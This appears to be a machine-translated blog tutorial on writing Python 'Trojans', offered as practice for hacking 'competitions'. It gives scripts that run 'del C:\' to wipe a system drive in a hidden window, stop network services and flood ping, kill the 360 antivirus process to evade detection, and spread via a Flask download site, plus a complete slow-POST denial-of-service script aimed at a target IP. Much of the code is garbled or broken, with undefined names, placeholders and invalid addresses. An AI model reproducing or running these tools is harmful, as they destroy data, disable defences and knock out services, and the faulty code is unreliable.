Introducer
Well, I have written many articles before. This time I will write an advanced version of virus, which is a little long!
Prior instructions
Don't spray if you don't like it! In addition, if there is any problem, don't trust me privately. I don't have time to read it. Just leave a message at the bottom of the article. In addition, all the technologies in the article are my own research results. Don't plagiarize! Please obey the law
Other languages
This article is in Python, you can also use other languages
prepare
If you are reading my article for the first time, please be prepared:
1.VirtualBox
Baidu searches VirtualBox software, click download, and install it according to the wizard.
2. image file
Baidu searches MSDN. I tell you, click the operating system and select the appropriate version in the check box on the right. Here, take Windows7 Enterprise(x86) as an example
Then copy the ed2k address and download it in Xunlei.
3. install virtual machine
Next, create a virtual machine and select the appropriate parameters. Since everyone's situation here is different, I won't say more. Finally, select the image file.
4. install Python
I will not elaborate here. You can download it according to your actual situation
Elementary chapter
Previously, I published an article on chrome vulnerability analysis. In the article, I listed an example to practice how to find out the vulnerabilities that may be exploited by hackers in the code. At that time, it was a database file. This is the basis of the vulnerability. I will publish an article later to explain the ctf actual combat and vulnerability basis.
Trojan writing
We have written several Trojan viruses before. Now let's take a look at a piece of code:
import tkinter
import subprocess
del = subprocess.call("del C:\ ", shell=True)
window = tk.Tk()
window.withdraw()
window.mainloop()
This code is a powerful Trojan horse. Many users habitually choose "yes" and "OK" when they pop up windows. However, if you encounter this trojan horse, the Trojan horse will directly delete your C disk, which means that your system cannot be used, because most system files come from the C disk. The last three sentences should actually mean running in the background.
So far, we have been exposed to generally destructive viruses. We will learn some more advanced viruses later. But before that, we are looking at a piece of code:
import os
import subprocess
os.system("net stop service")
ping = subprocess.call("ping -t -l 100 ip address", shell=True)
window = tk.Tk()
window.withdraw()
window.mainloop()
See? This is a simple network disconnection virus. At the same time, it will carry out a network blocking attack on this computer, and it is running in the background. Users should not be aware of it. net stop service is a CMD code that can stop a network service.
So far, we have learned a lot of Trojans. Although these Trojans are not powerful, this is the first time we have some viruses. This is not a small achievement. However, if you practice, you will find that some operations will be recognized by anti-virus software. What should you do?
Trojan free
We write code to avoid virus killing.
import os os.system(r'taskkill /F /IM 360safe.exe')
360safe is the process name of the 360 security guard. In addition, you can use software to complete operations, such as flower instructions. However, these software often contain viruses, so it is recommended to use them in the virtual machine.
In practice, deception is a skill that hackers must learn. Only when they know how to disguise themselves can their viruses not be discovered.
actual combat
I know that many people like to watch cyber security competitions. After mastering these skills, we can set up a cyber competition by ourselves, but it requires the strength of the team. For example, your teammates are:
a b c x y......
Competition rules
Take a look at the information of the computer to be attacked
Windows7 ultimate 64 bit
Anti virus software with Jinshan poison bully
Computer with Python environment
The IP address is: 10.7.0 (scrawled here)
Situation: one day, a computer user downloaded a virus software on the website, which was written by you.
You are required to fill in the code of the virus software and website code, and realize the anti kill.
analysis
First of all, the source code of the virus can directly copy the above code, such as the network disconnection Trojan horse, so the source file is as follows
virus.py
import os
import subprocess
os.system("net stop service")
ping = subprocess.call("ping -t -l 100 10.7.0", shell=True)
window = tk.Tk()
window.withdraw()
window.mainloop()
Then it is encapsulated as virus Exe
Next is the code of the website, where the default flask page is public and accessible to all:
website.py
from flask import Flask
app = Flask(__name__)
@app.route('/')
def downloud():
$$$#Part of the code is omitted here
if __name__ == "__main__":
app.run(debug=True)
After that, the next step is to avoid killing. The process name is kxetray Exe, just refer to the previous code.
Intermediate
DDOS distributed attack
The previous viruses were simple and demanding. So now we want to create a more powerful virus. It only needs to know the IP address to attack. That is DDOS attack. Here I reprint a part of a blogger's article. Original address: https://blog.csdn.net/tiantian520ttjs/article/details/103107836 .
Distributed Denial of Service (DDoS) attack means that multiple attackers in different locations attack one or more targets at the same time, or an attacker controls multiple machines in different locations and uses these machines to attack the victim at the same time. Since the attack points are distributed in different places, this kind of attack is called Distributed Denial of Service attack, in which there can be multiple attackers.
import socket
import time
import threading
#Pressure Test,ddos tool
#---------------------------
MAX_CONN=20000
PORT=80
HOST=""#Enter the IP or domain name of the other party in double quotation marks to ensure that it is connected or powered on
PAGE="/index.php"
#---------------------------
buf=("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE,HOST))
socks=[]
def conn_thread():
global socks
for i in range(0,MAX_CONN):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((HOST,PORT))
s.send(buf.encode())
print ("Send buf OK!,conn=%d\n"%i)
socks.append(s)
except Exception as ex:
print ("Could not connect to server or send error:%s"%ex)
time.sleep(0.1)
#end def
def send_thread():
global socks
while True:
for s in socks:
try:
s.send("f".encode())
#print "send OK!"
except Exception as ex:
print ("Send Exception:%s\n"%ex)
socks.remove(s)
s.close()
time.sleep(0.1)
#end def
conn_th=threading.Thread(target=conn_thread,args=())
send_th=threading.Thread(target=send_thread,args=())
conn_th.start()
send_th.start()
Original link: https://blog.csdn.net/tiantian520ttjs/article/details/103107836
The above is the source code of DDOS attack. Now we can use this program to organize a huge DDOS attack.
Web part
If you are careful enough, you will find that each of my articles has a part, that is, the Web part. Why should we learn Web? Because now, everyone can't live without the Internet. Browser, page is not uncommon. As hackers or programmers, if we want to build the network, we cannot do without the basic parts of the Web, including TCP/IP, SQL, html/css parsing, Web crawlers and many other knowledge. Most of them are abstract and difficult to learn. So we learn a little at a time so that we won't feel tired.
while True:
print("Come on!")
Here, I will not elaborate more, because I really can't think of what to write.
But don't lose heart, because in the advanced chapter, there will be a huge practical project
Advanced
Competition rules
Take a look at the information of the computer to be attacked
Windows10 ultimate 64 bit
Anti virus software with Jinshan poison bully
The IP address is: 10.7.1 (scrawled here)
Requirement: use DDOS attack method to attack this computer and avoid killing
analysis
First, in the code section, you can directly use the above code.
ddos.py
import socket
import time
import threading
#Pressure Test,ddos tool
#---------------------------
MAX_CONN=20000
PORT=80
HOST="10.7.1"#Enter the IP or domain name of the other party in double quotation marks to ensure that it is connected or powered on
PAGE="/index.php"
#---------------------------
buf=("POST %s HTTP/1.1\r\n"
"Host: %s\r\n"
"Content-Length: 10000000\r\n"
"Cookie: dklkt_dos_test\r\n"
"\r\n" % (PAGE,HOST))
socks=[]
def conn_thread():
global socks
for i in range(0,MAX_CONN):
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((HOST,PORT))
s.send(buf.encode())
print ("Send buf OK!,conn=%d\n"%i)
socks.append(s)
except Exception as ex:
print ("Could not connect to server or send error:%s"%ex)
time.sleep(0.1)
#end def
def send_thread():
global socks
while True:
for s in socks:
try:
s.send("f".encode())
#print "send OK!"
except Exception as ex:
print ("Send Exception:%s\n"%ex)
socks.remove(s)
s.close()
time.sleep(0.1)
#end def
conn_th=threading.Thread(target=conn_thread,args=())
send_th=threading.Thread(target=send_thread,args=())
conn_th.start()
send_th.start()
No killing has just been established, so we won't show more. Soon, the computer will be unable to use due to information overload. We can also implement it in combination with network congestion attack.
finish
Well, I wrote such a long article today. I hope you will like it. If you don't mind, you can give me a concern, which is my driving force
good-bye